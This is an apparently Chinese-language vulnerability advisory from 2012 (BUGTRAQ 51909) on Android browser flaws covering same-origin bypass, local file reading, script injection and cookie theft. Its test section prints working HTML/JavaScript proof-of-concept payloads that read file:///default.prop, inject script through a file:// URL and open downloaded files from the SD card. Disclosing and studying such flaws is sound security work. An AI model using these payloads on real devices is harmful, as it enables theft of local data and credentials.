Open Handset Alliance Android多个远程安全漏洞

Open Handset Alliance Android多个远程安全漏洞

发布日期：2012-02-08
更新日期：2012-02-09

受影响系统：
Open Handset Alliance Open Handset Alliance Android 2.3.2
Open Handset Alliance Open Handset Alliance Android  3.5
Open Handset Alliance Open Handset Alliance Android  3.2
Open Handset Alliance Open Handset Alliance Android  3.1
Open Handset Alliance Open Handset Alliance Android  3.0
Open Handset Alliance Open Handset Alliance Android  2.4
Open Handset Alliance Open Handset Alliance Android  2.3.6
Open Handset Alliance Open Handset Alliance Android  2.3.4
Open Handset Alliance Open Handset Alliance Android  2.3.1
Open Handset Alliance Open Handset Alliance Android  2.3
Open Handset Alliance Open Handset Alliance Android  2.2
Open Handset Alliance Open Handset Alliance Android  2.2
Open Handset Alliance Open Handset Alliance Android  2.1.1
Open Handset Alliance Open Handset Alliance Android  2.1
Open Handset Alliance Open Handset Alliance Android  2.0.1
Open Handset Alliance Open Handset Alliance Android  2.0
Open Handset Alliance Open Handset Alliance Android  1.5 CRCxx
Open Handset Alliance Open Handset Alliance Android  1.5 CRBxx
Open Handset Alliance Open Handset Alliance Android  1.5 CRB-43
Open Handset Alliance Open Handset Alliance Android  1.5 CRB-42
Open Handset Alliance Open Handset Alliance Android  1.5 COCxx
Open Handset Alliance Open Handset Alliance Android  1.5 CBDxx
Open Handset Alliance Open Handset Alliance Android  1.5
Open Handset Alliance Open Handset Alliance Android  1.0
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 51909

Android是Google通过Open Handset Alliance发起的项目，用于为移动设备提供完整的软件集，包括操作系统、中间件等。

Open Handset Alliance在实现上存在多个安全漏洞，远程攻击者可利用这些漏洞绕过同源保护、获取敏感信息、执行任意脚本代码、窃取Cookie验证凭证、执行某些管理员操作。

<*来源：80vul
  *>

测试方法：
--------------------------------------------------------------------------------
警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Cross-domain scripting:
1.

<script>
var request = false;
        if(window.XMLHttpRequest) {
            request = new XMLHttpRequest();
            if(request.overrideMimeType) {
                request.overrideMimeType('text/xml');
            }
        } else if(window.ActiveXObject) {
            var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP',
            'Microsoft.XMLHTTP',
            'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0',
            'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
            for(var i=0; i<versions.length; i++) {
                try {
                    request = new ActiveXObject(versions[i]);
                } catch(e) {}
            }
        }
              
xmlhttp=request;

//xmlhttp.open("GET", "file://///default.prop", false);
//xmlhttp.open("GET", "http://www.80vul.com/", false);
xmlhttp.send(null);
var ret = xmlhttp.responseText;

alert(ret);
</script>

2.

<iframe name=f src="location.php" ></iframe>
<script>
function init(){
  f.location = "file:///default.prop";
}
setTimeout(init,5000)
</script>

Security Weakness:

1.

<iframe name=f src="location.php" ></iframe>
<script>
function init(){
  f.location = "file:///ssss<sc"+"ript>alert(1);</sc"+"ript>/";
}
setTimeout(init,5000)
</script>

2.

<meta http-equiv="refresh" content="0;URL=autodown.php"/>
<iframe name=f src="location.php" ></iframe>
<script>
function init(){
  f.location = "file:///sdcard/Download/autodown.htm";
}
setTimeout(init,5000)
</script>

建议：
--------------------------------------------------------------------------------
厂商补丁：

Open Handset Alliance
---------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.openhandsetalliance.com/android_overview.html